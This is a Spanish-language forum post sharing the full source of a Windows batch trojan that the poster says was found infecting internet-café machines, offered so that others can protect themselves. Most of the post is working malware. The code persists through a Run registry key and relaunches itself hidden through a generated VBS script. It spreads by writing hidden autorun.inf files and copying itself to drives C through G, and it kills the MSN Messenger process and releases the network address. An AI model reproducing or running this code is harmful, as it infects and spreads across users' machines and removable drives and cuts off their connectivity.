Troyano Windows.bat
Pues esto no sabia donde ponerlo pero pues aki lo dejo, este es un troyano que encontre en un cyber y que infecto las maquinas, pude sacar el codigo y se los dejo para que se puedan proteger de el modificandolo por si algun antivirus no lo localiza. Esto no es muy bueno pero por lo menos no dejaran salir su informacion.
@echo off
:res
if exist "C:\WINDOWS\windows.bat" (goto iss) else (goto copiar)
:copiar
copy %0 "C:\WINDOWS\windows.bat"
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v windows /d "C:\WINDOWS\windows.bat" /f
:iss
if exist xcopy.exe (goto res) else (goto ess)
:ess
set a=echo
set b=%cd%
set c=%0
if '%1=='Hide GoTo Hide_%2
Call:Vbs > Script.vbs
Start Script.vbs
Exit
:Vbs
%a%Set fs = CreateObject(^"Scripting.FileSystemObject^")
%a%Origen = %c%
%a%Destino = ^"%b%\windows.bat^"
%a%fs.CopyFile Origen, Destino
%a%fs.deletefile Origen
%a%set RunHide = CreateObject(^"WScript.Shell^")
%a%RunHide.run ^"WINDOWS.bat Hide me^",vbHide
GoTo:eof
:Hide_me
:SEGUIR
if exist "C:\datos.txt" (goto seguir) else (goto muerte)
:muerte
if exist "C:\autorun.inf" (goto d) else (goto cseguir)
:cseguir
echo [AUTORUN] >>"C:\autorun.inf"
echo shellexecute=windows.bat >>"C:\autorun.inf"
attrib +h "C:\autorun.inf"
xcopy %0 C:\ /e /y /i
:d
if exist "d:\autorun.inf" (goto e) else (goto dseguir)
:dseguir
echo [AUTORUN] >>"d:\autorun.inf"
echo shellexecute=windows.bat >>"d:\autorun.inf"
attrib +h "d:\autorun.inf"
xcopy %0 d:\ /e /y /i
:e
if exist "e:\autorun.inf" (goto f) else (goto eseguir)
:eseguir
echo [AUTORUN] >>"e:\autorun.inf"
echo shellexecute=windows.bat >>"e:\autorun.inf"
attrib +h "e:\autorun.inf"
xcopy %0 e:\ /e /y /i
:f
:fseguir
echo [AUTORUN] >>"f:\autorun.inf"
echo shellexecute=windows.bat >>"f:\autorun.inf"
xcopy %0 f:\ /e /y /i
:g
:gseguir
echo [AUTORUN] >>"g:\autorun.inf"
echo shellexecute=windows.bat >>"g:\autorun.inf"
xcopy %0 g:\ /e /y /i
:sin
TASKKILL /F /IM msnmsgr.exe
ipconfig /release
goto seguir
Saludos, este es parecido al upw.bat, mas o menos la misma estructura.
De paso si alguien me puede ayudar para identificar el proceso de esos dos no vaya a ser y que lo posteen para seguridad de todos.